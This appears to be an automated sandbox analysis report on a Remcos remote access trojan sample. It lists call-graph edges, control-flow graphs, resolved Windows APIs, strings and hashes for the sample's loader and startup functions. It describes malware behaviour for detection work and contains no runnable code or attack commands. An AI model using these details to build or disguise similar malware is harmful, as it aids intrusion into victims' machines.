11 API calls std::_Deallocate 46359->46368 46362 4024fa 46361->46362 46363 402500 46362->46363 46364 402515 46362->46364 46369 402549 46363->46369 46379 4028c8 28 API calls 46364->46379 46367 402513 46367->46353 46368->46358 46380 402868 46369->46380 46371 40255d 46372 402572 46371->46372 46373 402587 46371->46373 46385 402a14 22 API calls 46372->46385 46387 4028c8 28 API calls 46373->46387 46376 40257b 46386 4029ba 22 API calls 46376->46386 46378 402585 46378->46367 46379->46367 46381 402870 46380->46381 46382 402878 46381->46382 46388 402c83 22 API calls 46381->46388 46382->46371 46385->46376 46386->46378 46387->46378 46390 4020c7 46389->46390 46391 4023ae 11 API calls 46390->46391 46392 4020d2 46391->46392 46392->46219 46393->46219 46395 41aba7 46394->46395 46396 41ac06 46395->46396 46400 41abb7 46395->46400 46397 41ac20 46396->46397 46398 41ad46 28 API calls 46396->46398 46415 41aec3 28 API calls 46397->46415 46398->46397 46401 41abef 46400->46401 46406 41ad46 46400->46406 46414 41aec3 28 API calls 46401->46414 46404 41ac02 46404->46219 46405->46228 46408 41ad4e 46406->46408 46407 41ad80 46407->46401 46408->46407 46409 41ad84 46408->46409 46412 41ad68 46408->46412 46426 402705 22 API calls 46409->46426 46416 41adb7 46412->46416 46414->46404 46415->46404 46417 41adc1 __EH_prolog 46416->46417 46427 4026f7 22 API calls 46417->46427 46419 41add4 46428 41aeda 11 API calls 46419->46428 46421 41ae32 46421->46407 46422 41adfa 46422->46421 46429 402710 11 API calls 46422->46429 46424 41ae19 46430 4026f2 11 API calls std::_Deallocate 46424->46430 46427->46419 46428->46422 46429->46424 46430->46421 46431->46242 46432->46246 46433->46248 46454 40f821 46434->46454 46437 40f55d 46532 40f7fb 46437->46532 46439 40f565 46537 40f44c 46439->46537 46441 40e651 46442 40f502 46441->46442 46443 40f510 46442->46443 46449 40f53f std::ios_base::_Ios_base_dtor 46442->46449 46542 4335cb 65 API calls 46443->46542 46445 40f51d 46446 40f44c 20 API calls 46445->46446 46445->46449 46447 40f52e 46446->46447 46543 40fbc8 77 API calls 6 library calls 46447->46543 46449->46257 46451 40f66b 46450->46451 46452 40f67e 46450->46452 46544 40f854 36 API calls 46451->46544 46452->46256 46461 40d2ce 46454->46461 46458 40f83c 46459 40e631 46458->46459 46460 40f663 36 API calls 46458->46460 46459->46437 46460->46459 46462 40d2ff 46461->46462 46463 43229f new 22 API calls 46462->46463 46464 40d306 46463->46464 46471 40cb7a 46464->46471 46467 40f887 46468 40f896 46467->46468 46506 40f8b7 46468->46506 46470 40f89c std::ios_base::_Ios_base_dtor 46470->46458 46474 4332ea 46471->46474 46473 40cb84 46473->46467 46475 4332f6 __EH_prolog3 46474->46475 46486 4330a5 46475->46486 46478 433332 46492 4330fd 46478->46492 46480 433314 46500 43347f 37 API calls _Atexit 46480->46500 46482 433370 std::locale::_Init 46482->46473 46484 43331c 46501 433240 21 API calls 2 library calls 46484->46501 46487 4330b4 46486->46487 46488 4330bb 46486->46488 46502 442df9 EnterCriticalSection _Atexit 46487->46502 46489 4330b9 46488->46489 46503 43393c EnterCriticalSection 46488->46503 46489->46478 46499 43345a 22 API calls 2 library calls 46489->46499 46493 433107 46492->46493 46494 442e02 46492->46494 46495 43311a 46493->46495 46504 43394a LeaveCriticalSection 46493->46504 46505 442de2 LeaveCriticalSection 46494->46505 46495->46482 46498 442e09 46498->46482 46499->46480 46500->46484 46501->46478 46502->46489 46503->46489 46504->46495 46505->46498 46507 4330a5 std::_Lockit::_Lockit 2 API calls 46506->46507 46508 40f8c9 46507->46508 46527 40cae9 4 API calls 2 library calls 46508->46527 46510 40f8dc 46519 40f8ef 46510->46519 46528 40ccd4 77 API calls new 46510->46528 46511 4330fd std::_Lockit::~_Lockit 2 API calls 46512 40f925 46511->46512 46512->46470 46514 40f8ff 46515 40f906 46514->46515 46516 40f92d 46514->46516 46529 4332b6 22 API calls new 46515->46529 46530 436ec6 RaiseException 46516->46530 46519->46511 46520 40f943 46521 40f984 46520->46521 46531 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 46520->46531 46521->46470 46527->46510 46528->46514 46529->46519 46530->46520 46533 43229f new 22 API calls 46532->46533 46534 40f80b 46533->46534 46535 40cb7a 41 API calls 46534->46535 46536 40f813 46535->46536 46536->46439 46538 40f469 46537->46538 46539 40f48b 46538->46539 46541 43aa1a 20 API calls 2 library calls 46538->46541 46539->46441 46541->46539 46542->46445 46543->46449 46544->46452 46548 40fd0e 46546->46548 46547 40fd3c 46547->46271 46548->46547 46554 40fe14 36 API calls 46548->46554 46551 40fce8 46550->46551 46553 40fcf3 46551->46553 46555 40fe79 36 API calls __EH_prolog 46551->46555 46553->46270 46554->46547 46555->46553 46557 40f4d4 46556->46557 46563 40f4d0 46556->46563 46564 40f30b 67 API calls 46557->46564 46559 40f4d9 46565 43a716 64 API calls 3 library calls 46559->46565 46560 40f44c 20 API calls 46562 40e5c5 46560->46562 46562->46275 46562->46276 46563->46560 46564->46559 46565->46563 46566->46279 46569 40328a 46567->46569 46568 4032a9 46568->46284 46569->46568 46571 4028c8 28 API calls 46569->46571 46571->46568 46573 4051db 46572->46573 46582 405254 46573->46582 46575 4051e8 46575->46287 46577 402041 46576->46577 46578 4023ae 11 API calls 46577->46578 46579 40205b 46578->46579 46587 40265a 46579->46587 46583 405262 46582->46583 46586 402884 22 API calls 46583->46586 46588 40266b 46587->46588 46589 4023ae 11 API calls 46588->46589 46590 40206d 46589->46590 46590->46290 46591->46298 46592->46303 46601 411253 61 API calls 46594->46601 46603 4406a8 _Atexit 46602->46603 46604 4406c0 46603->46604 46605 4407f6 _Atexit GetModuleHandleW 46603->46605 46624 442d9a EnterCriticalSection 46604->46624 46607 4406b4 46605->46607 46607->46604 46636 44083a GetModuleHandleExW 46607->46636 46610 4406c8 46620 440766 46610->46620 46622 44073d 46610->46622 46644 441450 20 API calls _Atexit 46610->46644 46612 440783 46628 4407b5 46612->46628 46613 4407af 46647 454909 5 API calls _ValidateLocalCookies 46613->46647 46619 440755 46646 441707 5 API calls _ValidateLocalCookies 46619->46646 46625 4407a6 46620->46625 46622->46619 46645 441707 5 API calls _ValidateLocalCookies 46622->46645 46624->46610 46648 442de2 LeaveCriticalSection 46625->46648 46627 44077f 46627->46612 46627->46613 46649 4461f8 46628->46649 46631 4407e3 46634 44083a _Atexit 8 API calls 46631->46634 46632 4407c3 GetPEB 46632->46631 46633 4407d3 GetCurrentProcess TerminateProcess 46632->46633 46633->46631 46635 4407eb ExitProcess 46634->46635 46637 440864 GetProcAddress 46636->46637 46638 440887 46636->46638 46639 440879 46637->46639 46640 440896 46638->46640 46641 44088d FreeLibrary 46638->46641 46639->46638 46642 432d4b _ValidateLocalCookies 5 API calls 46640->46642 46641->46640 46643 4408a0 46642->46643 46643->46604 46644->46622 46645->46619 46646->46620 46648->46627 46650 44621d 46649->46650 46654 446213 46649->46654 46655 4459f9 46650->46655 46652 432d4b _ValidateLocalCookies 5 API calls 46653 4407bf 46652->46653 46653->46631 46653->46632 46654->46652 46656 445a29 46655->46656 46659 445a25 46655->46659 46656->46654 46657 445a49 46657->46656 46660 445a55 GetProcAddress 46657->46660 46659->46656 46659->46657 46662 445a95 46659->46662 46661 445a65 __crt_fast_encode_pointer 46660->46661 46661->46656 46663 445ab6 LoadLibraryExW 46662->46663 46667 445aab 46662->46667 46664 445ad3 GetLastError 46663->46664 46668 445aeb 46663->46668 46666 445ade LoadLibraryExW 46664->46666 46664->46668 46665 445b02 FreeLibrary 46665->46667 46666->46668 46667->46659 46668->46665 46668->46667

                                Executed Functions

                                Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$HandleModule$LibraryLoad
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                • API String ID: 551388010-2474455403
                                • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E
                                Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 450 4407b5-4407c1 call 4461f8 453 4407e3-4407ef call 44083a ExitProcess 450->453 454 4407c3-4407d1 GetPEB 450->454 454->453 455 4407d3-4407dd GetCurrentProcess TerminateProcess 454->455 455->453
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                                • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                                • ExitProcess.KERNEL32 ref: 004407EF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                                Function 0040D3F0 Relevance: 69.0, APIs: 16, Strings: 23, Instructions: 774COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 103 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->103 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 90 40d991-40d99a call 401fb8 80->90 91 40d67f-40d686 80->91 99 40d622-40d63f call 401f8b call 411f34 81->99 100 40d60f-40d61c WaitForSingleObject CloseHandle 81->100 108 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->108 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 106 40d6b0-40d6b4 95->106 107 40d6a9-40d6ab 95->107 122 40d651 99->122 123 40d641-40d650 call 401f8b call 41239a 99->123 100->99 136 40dd2c 103->136 112 40d6b6-40d6c9 call 401e45 call 401f8b 106->112 113 40d717-40d72a call 401e45 call 401f8b 106->113 107->106 179 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 108->179 112->113 140 40d6cb-40d6d1 112->140 142 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 113->142 143 40d72c call 40e501 113->143 122->80 123->122 141 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 136->141 140->113 147 40d6d3-40d6d9 140->147 188 40dd6a-40dd6f call 413980 141->188 216 40d815-40d819 142->216 217 40d7af-40d7c8 call 401e45 call 401f8b call 439891 142->217 143->142 152 40d6f7-40d710 call 401f8b call 411eea 147->152 153 40d6db-40d6ee call 4060ea 147->153 152->113 178 40d712 call 4066a6 152->178 153->113 169 40d6f0-40d6f5 call 4067a0 153->169 169->113 178->113 221 40da61-40da63 179->221 222 40da65-40da67 179->222 216->108 220 40d81f-40d826 216->220 217->216 250 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 217->250 227 40d8a7-40d8b1 call 408093 220->227 228 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 220->228 223 40da6b-40da7c call 41aa4f CreateThread 221->223 224 40da69 222->224 225 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 222->225 223->225 224->223 349 40db83-40db9a call 401e45 call 401f8b 225->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 225->350 237 40d8b6-40d8de call 40245c call 43254d 227->237 228->237 257 40d8f0 237->257 258 40d8e0-40d8ee call 434c30 237->258 250->216 260 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 257->260 258->260 260->179 332 40d96d-40d98c call 401e45 call 419bca call 40de34 260->332 332->179 346 40d98e-40d990 332->346 346->90 360 40dbd9-40dbeb call 401e45 call 401f8b 349->360 361 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->361 350->349 371 40dc4c-40dc5e call 401e45 call 401f8b 360->371 372 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 360->372 361->360 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 371->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 371->384 372->371 383->384 405 40dcc1 384->405 406 40dcc4-40dcd7 CreateThread 384->406 405->406 410 40dce5-40dcec 406->410 411 40dcd9-40dce3 CreateThread 406->411 412 40dcfa-40dd01 410->412 413 40dcee-40dcf8 CreateThread 410->413 411->410 412->136 416 40dd03-40dd06 412->416 413->412 416->188 418 40dd08-40dd0d 416->418 418->141
                                APIs
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                  • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                • API String ID: 1529173511-1365410817
                                • Opcode ID: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
                                • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                • Opcode Fuzzy Hash: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
                                • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E
                                Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                • CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                • closesocket.WS2_32(?), ref: 00404E3A
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                                • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                                • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                                • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                • String ID:
                                • API String ID: 3658366068-0
                                • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58
                                Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 437 445a95-445aa9 438 445ab6-445ad1 LoadLibraryExW 437->438 439 445aab-445ab4 437->439 441 445ad3-445adc GetLastError 438->441 442 445afa-445b00 438->442 440 445b0d-445b0f 439->440 445 445ade-445ae9 LoadLibraryExW 441->445 446 445aeb 441->446 443 445b02-445b03 FreeLibrary 442->443 444 445b09 442->444 443->444 447 445b0b-445b0c 444->447 448 445aed-445aef 445->448 446->448 447->440 448->442 449 445af1-445af8 448->449 449->447
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                Function 004459F9 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 458 4459f9-445a23 459 445a25-445a27 458->459 460 445a8e 458->460 461 445a2d-445a33 459->461 462 445a29-445a2b 459->462 463 445a90-445a94 460->463 464 445a35-445a37 call 445a95 461->464 465 445a4f 461->465 462->463 468 445a3c-445a3f 464->468 467 445a51-445a53 465->467 469 445a55-445a63 GetProcAddress 467->469 470 445a7e-445a8c 467->470 471 445a70-445a76 468->471 472 445a41-445a47 468->472 473 445a65-445a6e call 432123 469->473 474 445a78 469->474 470->460 471->467 472->464 475 445a49 472->475 473->462 474->470 475->465
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc__crt_fast_encode_pointer
                                • String ID:
                                • API String ID: 2279764990-0
                                • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
